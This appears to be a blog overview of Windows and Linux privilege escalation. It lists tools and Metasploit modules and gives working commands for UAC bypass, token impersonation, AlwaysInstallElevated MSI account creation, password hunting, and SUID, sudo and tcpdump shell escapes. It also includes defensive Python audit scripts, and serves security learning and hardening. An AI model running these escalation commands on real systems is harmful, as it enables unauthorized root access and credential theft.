About Privilege Escalation
TyeYeah Lv4

Recently I got some time to collect materials about privilege escalation, to provide you with useful tools and some basic knowledge (an overview, not details).

Windows

You can refer to Windows Privilege Escalation Fundamentals and Windows Privilege Escalation Guide.

We skip the Information Gathering part and move on to the other topics.

Kernel Exploit

Tools that compare installed patches against known vulnerabilities:

https://github.com/bitsadmin/wesng
https://github.com/ianxtianxt/win-exp-
https://github.com/SecWiki/windows-kernel-exploits

Or query by hand:

```text
# query manually
> systeminfo
> wmic qfe get Caption,Description,HotFixID,InstalledOn

# MSF modules
post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester

# PowerShell script (Sherlock, from https://github.com/rasta-mouse/Sherlock)
> Import-Module C:\Sherlock.ps1
> Find-AllVulns
```

Or use the crafted wmic_info.bat:

```batch
REM locate the htable.xsl stylesheet that renders WMI output as HTML
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"

REM every query below is appended to out.html using that stylesheet
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
```

And some MSF exploits:
Windows ClientCopyImage Win32k Exploit

  • Windows 7 x64, x86, Windows 2008 R2 SP1 x64
  • exploit/windows/local/ms15_051_client_copy_image

Windows TrackPopupMenu Win32k NULL pointer dereference

  • Windows XP SP3, Windows Server 2003 SP2, Windows 7 SP1, Windows Server 2008 32-bit, Windows Server 2008 R2 SP1 64-bit
  • exploit/windows/local/ms14_058_track_popup_menu

KiTrap0D exploit

  • Windows Server 2003 32, Windows Server 2008 32, Windows 7 32, Windows XP
  • exploit/windows/local/ms10_015_kitrap0d

Task Scheduler XML escalation

  • Windows Vista, Windows 7, Windows Server 2008 x64 and x86
  • exploit/windows/local/ms10_092_schelevator

MS16-016 mrxdav.sys WebDav local escalation

  • Windows 7 SP1 x86
  • exploit/windows/local/ms16_016_webdav

EPATHOBJ::pprFlattenRec local escalation

  • Windows XP SP3, Windows 2003 SP1, Windows 7 SP1
  • exploit/windows/local/ppr_flatten_rec

MS13-053 : NTUserMessageCall Win32k kernel pool overflow

  • Windows 7 SP1 x86
  • exploit/windows/local/ms13_053_schlamperei

MS16-032 Secondary Logon Handle escalation

  • Windows 7 to 10, Server 2008 to 2012 (32/64-bit), and Windows versions with PowerShell 2.0 or higher
  • exploit/windows/local/ms16_032_secondary_logon_handle_privesc

RottenPotato

```text
meterpreter> load incognito            # or use incognito
meterpreter> list_token -u             # list the tokens available for impersonation
WIN-2HU3N1\Administrator
meterpreter> impersonate_token WIN-2HU3N1\\Administrator
# or use RottenPotato directly
$ git clone https://github.com/foxglovesec/RottenPotato.git
$ cd RottenPotato
# find rottenpotato.exe
meterpreter> upload /root/Desktop/RottenPotato/rottenpotato.exe .
meterpreter> execute -Hc -f rottenpotato.exe
meterpreter> impersonate_token "NT AUTHORITY\\SYSTEM"
```

Configuration Errors

This covers system service privilege misconfigurations, trusted (unquoted) service path vulnerabilities, and scheduled tasks.

Methods to check:

```text
# Empire module
privesc/powerup/allchecks
```

System service privilege config:
Since services started at boot run with high privileges, if their permissions are misconfigured we can use them to elevate.

```text
# PowerShell attack script
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
# MSF attack module, needs an existing session
exploit/windows/local/service_permissions
```

Trusted service path vulns:
If a service executable path is not wrapped in quotes and contains a space, it is vulnerable.

```text
# Search for vulnerable services
> wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
# MSF attack module
exploit/windows/local/trusted_service_path
# Migrate right away, because the session disconnects automatically
set AutoRunScript migrate -f
```
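The findstr one-liner above only lists candidates; to audit them systematically, here is an added Python example (not from the original post or any of the projects it links) that parses the output of `wmic service get Name,PathName,StartMode /format:csv`, keeps the auto-start services whose unquoted path contains spaces, and lists the intermediate executables Windows would try before the real binary, which is exactly where a defender must verify that no unprivileged user has write access. The CSV sample, hostname and service names are constructed.

```python
"""Audit Windows service paths for the unquoted-path weakness.

Added example; the input is a constructed sample in the shape of
  wmic service get Name,PathName,StartMode /format:csv
(assumed: wmic writes a blank first line and a leading Node column).
"""
from dataclasses import dataclass
from typing import List

# Constructed sample: hostname, service names and paths are invented.
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode
HOST01,GoodSvc,"C:\Program Files\Good Vendor\good.exe" -run,Auto
HOST01,BadSvc,C:\Program Files\Vendor Tool\agent.exe -config default,Auto
HOST01,ManualSvc,C:\Program Files\Other Tool\other.exe,Manual
HOST01,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST01,NoSpace,C:\Tools\svc.exe,Auto
"""


@dataclass
class Finding:
    name: str
    path: str
    hijack_candidates: List[str]   # executables Windows would try before the real one


def parse_wmic_csv(text: str):
    """Split wmic CSV rows into dicts. wmic does not quote fields, so split on
    the first two and the last comma instead of using csv.reader (assumes the
    service name and StartMode contain no commas)."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("Node,"):
            continue
        head, start_mode = line.rsplit(",", 1)
        _node, name, path_name = head.split(",", 2)
        rows.append({"Name": name, "PathName": path_name, "StartMode": start_mode})
    return rows


def hijack_candidates(path_name: str) -> List[str]:
    """For an unquoted path, list the executables the service control manager
    would try before the real one: each space is a possible end of the program
    name, and ".exe" is appended to that prefix."""
    candidates = []
    for i, ch in enumerate(path_name):
        if ch != " ":
            continue
        prefix = path_name[:i]
        if prefix.lower().endswith(".exe"):
            break   # reached the real binary; what follows are arguments
        candidates.append(prefix + ".exe")
    return candidates


def audit_unquoted_service_paths(text: str, skip_windows_dir: bool = True) -> List[Finding]:
    """Return auto-start services whose unquoted path contains spaces."""
    findings = []
    for row in parse_wmic_csv(text):
        if row["StartMode"].lower() != "auto":
            continue
        path = row["PathName"].strip()
        if path.startswith('"'):
            continue                      # properly quoted
        if skip_windows_dir and path.lower().startswith("c:\\windows\\"):
            continue                      # same filter as the findstr one-liner
        candidates = hijack_candidates(path)
        if candidates:
            findings.append(Finding(row["Name"], path, candidates))
    return findings


if __name__ == "__main__":
    for f in audit_unquoted_service_paths(SAMPLE_WMIC_CSV):
        print(f"{f.name}: {f.path}")
        for c in f.hijack_candidates:
            print(f"    verify that {c!r} and its directory are not writable by standard users")
```

The remediation is the mirror image of the check: quote the service's ImagePath (for example with `sc config`) and confirm with accesschk that none of the listed intermediate directories grants write access to standard users.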

Scheduled tasks:
Since tasks are executed by highly privileged users, if the directories they run from are writable by normal users, they are vulnerable.

```text
# List scheduled tasks
> schtasks /query /fo LIST /v
# Check the permissions of a given directory
> accesschk.exe -dqv "D:\test" -accepteula
```

GPP Privilege Escalation

Group Policy Preferences (GPP)

```text
# PowerShell: obtain cpassword
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1
# MSF
post/windows/gather/credentials/gpp
# Empire
usemodule privesc/gpp
```

Bypass UAC

```text
# MSF
exploit/windows/local/ask # pops up a prompt; if the user clicks through, you get SYSTEM
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_fodhelper
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_comhijack
# PowerShell
https://github.com/samratashok/nishang/blob/master/Escalation/Invoke-PsUACme.ps1
# Empire
usemodule privesc/bypassuac
usemodule privesc/bypassuac_wscript
```

Token Stealing

Use RottenPotato.

Without Token

Use Responder.py

For Different OS Versions

  1. Windows 2000/2003, XP
    Use at (which creates scheduled tasks) to let a user in the Administrators group elevate to SYSTEM.

  2. Windows 7/8, 2003/2008, 2012/2016

  • sc to control services

    ```text
    > sc Create syscmd binPath= "cmd /K start" type= own type= interact
    > sc start syscmd
    ```

  • AlwaysInstallElevated: allows non-admin users to run *.msi installers with SYSTEM privileges

    ```text
    # disabled by default (the policy only applies when both values are set to 1)
    [HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001
    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001
    # check using
    C:> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    # or
    C:> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    # if not vulnerable
    ERROR: The system was unable to find the specified registry key or value.
    # else it prints the key values

    # attack
    > msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o rotten.msi
    > msiexec /quiet /qn /i C:\programdata\rotten.msi
    # /quiet: no messages to the user while installing
    # /qn: no GUI
    # /i: install the given package

    # MSF module
    exploit/windows/local/always_install_elevated
    ```

  • Unattended Installs: an XML file named Unattend.xml holds all the configuration for an unattended installation, including account settings. Look for it under these directories:

    ```text
    C:\Windows\Panther\
    C:\Windows\Panther\Unattend\
    C:\Windows\System32\
    C:\Windows\System32\sysprep\
    ```

    Besides Unattend.xml, sysprep.xml and sysprep.inf may also contain such settings.

    ```text
    > dir C:*vnc.ini /s /b /c
    > dir C:\ /s /b /c | findstr /sr *password*
    > findstr /si password *.txt *.xml *.ini
    > reg query HKLM /f password /t REG_SZ /s
    > reg query HKCU /f password /t REG_SZ /s
    # MSF module
    post/windows/gather/enum_unattend
    ```

  3. CVE
  • Windows 10: CVE-2020-0796
  • Windows 7/2008: CVE-2018-8120
  • Windows 7/8, 2008/2012/2016: CVE-2017-0213
  • SQL Server, IIS (local only, not domain): MS16-075 (RottenPotato)

Other Methods

Since there is far too much to mention, it is probably better to google each technique when you need it.

Linux

You can refer to Basic Linux Privilege Escalation; the information gathering part is covered in Linux Security Response.
Here are some recommended tools:

Kernel Exploit

Normally we need:

  1. a vulnerable kernel
  2. the corresponding exploit program
  3. a way to transfer the exploit to the target
  4. the ability to run it and have the kernel execute our payload

Search for exploits with

```text
site:exploit-db.com <kernel version>
python linprivchecker.py extended
```

Some CVEs, for example: CVE-2015-1328, CVE-2016-5195, CVE-2017-16995, CVE-2018-18955, CVE-2018-1000001, CVE-2019-13272. To test them, visit This and That for old images and old kernels.

DirtyCow (CVE-2016-5195) is the typical vulnerability used for privilege escalation and covers many kernel versions: PoCs

More exploits can be found at linux-kernel-exploits, but using them is not recommended, because afterwards the machine may become unstable and crash easily.

SUID

This part can refer to SUID Executables by penetration testing lab.

Other methods:

  • Use cp to overwrite /etc/shadow
  • Use mv to overwrite /etc/shadow or /etc/sudoers
  • awk: awk 'BEGIN {system("/bin/bash")}'
  • man:
    • man passwd
    • !/bin/bash
  • python/perl/ruby/lua/etc., for example:

    ```shell
    echo 'import os,stat ;os.chmod("/etc/passwd", stat.S_IRWXU|stat.S_IRWXG|stat.S_IRWXO)' >> test.py
    ```

  • tcpdump

    ```shell
    $ echo $'id\ncat /etc/shadow' > /tmp/.test
    $ chmod +x /tmp/.test
    $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
    ```

A cheat sheet for Linux privilege escalation is GTFOBins.

SUDO

The sudo command lets a normal user execute commands as the root user; its configuration is stored in /etc/sudoers.

The format of /etc/sudoers looks like:

```text
root ALL=(ALL) ALL
# the `root` user, on ALL hosts (1), may run as ALL users (2) ALL commands (3)
attacker ALL=(ALL) NOPASSWD:ALL
```

Use sudo -l to list the commands you are allowed to run; the exploitation methods are similar to SUID.
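Both the SUID section and the sudo section above come down to the same audit question: which binaries run as root, and is any of them one of the shell-escape programs listed there (cp, mv, awk, man, python, perl, ruby, lua, tcpdump)? The following added Python example (not from the original post) answers it for both cases: it flags setuid binaries by basename and parses /etc/sudoers user specifications, honouring the way a NOPASSWD: tag carries over to later commands on the same line. The sudoers text and the SUID entries are constructed samples; `scan_suid` is the helper you would point at a real filesystem.

```python
"""Audit SUID binaries and /etc/sudoers entries for shell-escape risk.
Added example, not from the original post; the samples are constructed."""
import os
import re
import stat
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Binaries the post lists as giving a root shell or arbitrary file write when
# run with elevated rights (python3 added as a common variant of python).
SHELL_ESCAPE_BINS = {"cp", "mv", "awk", "man", "python", "python3",
                     "perl", "ruby", "lua", "tcpdump"}


def audit_suid_entries(entries: Iterable[Tuple[str, int]]) -> List[str]:
    """entries: (path, st_mode) pairs. Returns setuid binaries whose basename
    is a known shell-escape program."""
    return [path for path, mode in entries
            if mode & stat.S_ISUID and os.path.basename(path) in SHELL_ESCAPE_BINS]


def scan_suid(root: str = "/"):
    """Walk a filesystem and yield (path, st_mode) for setuid regular files,
    the same information `find / -perm -4000 -type f` gives."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode


SAMPLE_SUDOERS = """
# constructed sample /etc/sudoers
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%admin   ALL=(ALL) ALL
attacker ALL=(ALL) NOPASSWD:ALL
backup   ALL=(root) NOPASSWD: /usr/bin/tcpdump, /usr/bin/rsync
deploy   ALL=(root) /usr/bin/systemctl restart app.service
"""

# user_or_%group  host = (runas) [TAG:]... command[, command...]
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


@dataclass
class SudoRule:
    who: str
    runas: str
    tags: frozenset
    command: str


def parse_sudoers(text: str) -> List[SudoRule]:
    """Parse user specifications. Aliases, Defaults and #include lines are
    skipped; tags such as NOPASSWD: apply to every later command on the line."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        tags = set()
        for item in m.group("cmds").split(","):
            item = item.strip()
            while ":" in item and item.split(":", 1)[0].strip().isupper():
                tag, item = item.split(":", 1)
                tags.add(tag.strip())
                item = item.strip()
            rules.append(SudoRule(m.group("who"), m.group("runas") or "root",
                                  frozenset(tags), item))
    return rules


def audit_sudoers(text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (who, command, reasons) for rules that hand out a root shell."""
    findings = []
    for rule in parse_sudoers(text):
        if rule.who == "root":
            continue
        reasons = []
        if rule.command == "ALL":
            reasons.append("ALL commands")
        elif os.path.basename(rule.command.split()[0]) in SHELL_ESCAPE_BINS:
            reasons.append("command can spawn a shell or write files as root")
        if reasons and "NOPASSWD" in rule.tags:
            reasons.append("no password required")
        if reasons:
            findings.append((rule.who, rule.command, reasons))
    return findings


if __name__ == "__main__":
    for who, cmd, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who}: {cmd} -> {'; '.join(why)}")
```

Note that `/usr/bin/rsync` in the sample inherits the NOPASSWD tag but is not reported, because the audit only flags commands that are themselves a shell escape; extend SHELL_ESCAPE_BINS from GTFOBins if you want broader coverage.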

Cronjob

Since crontab tasks are executed by the root user, if any of their config files or scripts is editable by normal users, you can make root execute anything you want.

To sum up, the SUID, sudo and cron job methods all depend on a normal user writing something that is then executed by the root user.

. in $PATH

We usually run a binary in the current directory as ./binary, but if . is added to $PATH we can run it by name directly.

However, if an attacker plants a malicious ls or cat and lures the root user into entering that directory and running the command, the root user executes the attacker's binary.
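The cron and `.`-in-$PATH cases above are both "writable location, executed as root" problems, so one audit covers them. This added Python example (not from the original post) checks /etc/crontab-style entries run as root for any path component an unprivileged user could replace, flags relative commands that depend on cron's PATH, and audits a PATH string for `.`, empty entries, relative entries and world-writable directories. A directory is only treated as hijackable when it is world-writable without the sticky bit, so /tmp does not produce noise. `build_demo` creates a constructed layout in a temporary directory so the whole thing runs offline; the crontab text is constructed too.

```python
"""Audit root cron jobs and PATH for writable locations.
Added example, not from the original post; the layout and crontab are constructed."""
import os
import stat
import tempfile
from typing import Dict, List, Tuple


def world_writable_without_sticky(path: str) -> bool:
    """True if any user can write to the file, or can create/rename entries in
    the directory and the sticky bit does not protect existing entries."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    if not mode & stat.S_IWOTH:
        return False
    if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
        return False      # e.g. /tmp: others cannot rename or delete your entries
    return True


def writable_components(path: str) -> List[str]:
    """The file itself and every parent directory an unprivileged user could
    replace or edit; any one of them lets the root-run command be swapped."""
    current = os.path.abspath(path)
    risky = []
    while True:
        if world_writable_without_sticky(current):
            risky.append(current)
        parent = os.path.dirname(current)
        if parent == current:
            return risky
        current = parent


def audit_path_variable(path_value: str) -> List[Tuple[str, str]]:
    """Flag PATH entries that let a planted binary shadow a real command."""
    problems = []
    for entry in path_value.split(":"):
        if entry in ("", "."):
            problems.append((entry or "<empty>", "current directory is searched"))
        elif not os.path.isabs(entry):
            problems.append((entry, "relative entry, resolved from the current directory"))
        elif world_writable_without_sticky(entry):
            problems.append((entry, "world-writable directory"))
    return problems


def audit_system_crontab(text: str) -> List[Tuple[str, str, str]]:
    """Audit /etc/crontab-style lines (min hour dom mon dow user command).
    Returns (program, offending item, reason) tuples."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("PATH="):
            findings += [("PATH", e, why) for e, why in audit_path_variable(line[5:])]
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or fields[5] != "root":
            continue
        program = fields[6].split()[0]
        if not os.path.isabs(program):
            findings.append((program, program, "relative command run as root, resolved via cron's PATH"))
            continue
        findings += [(program, c, "world-writable, job can be hijacked") for c in writable_components(program)]
    return findings


def build_demo() -> Dict[str, str]:
    """Constructed layout: a root cron script in a safe directory and one in a
    world-writable directory. Returns the paths and the crontab text."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    safe_dir, loose_dir = os.path.join(root, "safe"), os.path.join(root, "loose")
    os.mkdir(safe_dir, 0o755)
    os.mkdir(loose_dir)
    os.chmod(loose_dir, 0o777)            # the misconfiguration under test
    for d in (safe_dir, loose_dir):
        with open(os.path.join(d, "job.sh"), "w") as fh:
            fh.write("#!/bin/sh\necho job\n")
        os.chmod(os.path.join(d, "job.sh"), 0o755)
    crontab = (
        "# constructed sample /etc/crontab\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:.\n"
        f"*/5 * * * * root {safe_dir}/job.sh\n"
        f"*/5 * * * * root {loose_dir}/job.sh\n"
        "0 3 * * * root backup.sh --full\n"
    )
    return {"root": root, "safe_dir": safe_dir, "loose_dir": loose_dir, "crontab": crontab}


if __name__ == "__main__":
    demo = build_demo()
    for program, item, reason in audit_system_crontab(demo["crontab"]):
        print(f"{program}: {item} ({reason})")
```

Per-user crontabs (crontab -l) have no user field; to audit those, drop the `fields[5]` check and treat every line as run by the crontab's owner.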

Other Techniques

Exploiting Wildcard for Privilege Escalation

Other Useful Tools

Windows-Exploit-Suggester and Linux_Exploit_Suggester (quite old).

gtfo, a Python 3 tool that searches GTFOBins (Linux), LOLBAS (Windows) and LOOBins (macOS) for system commands that can be used to elevate.

PEASS - Privilege Escalation Awesome Scripts SUITE also provides scripts for both Linux and Windows.

A curated list of awesome privilege escalation: Awesome Privilege Escalation

A pack of Windows exploits.

Besides these, there are BeRoot to find configuration errors, and Vulmap and WindowsVulnScan to scan for vulnerabilities.

Online searching includes (in Chinese):
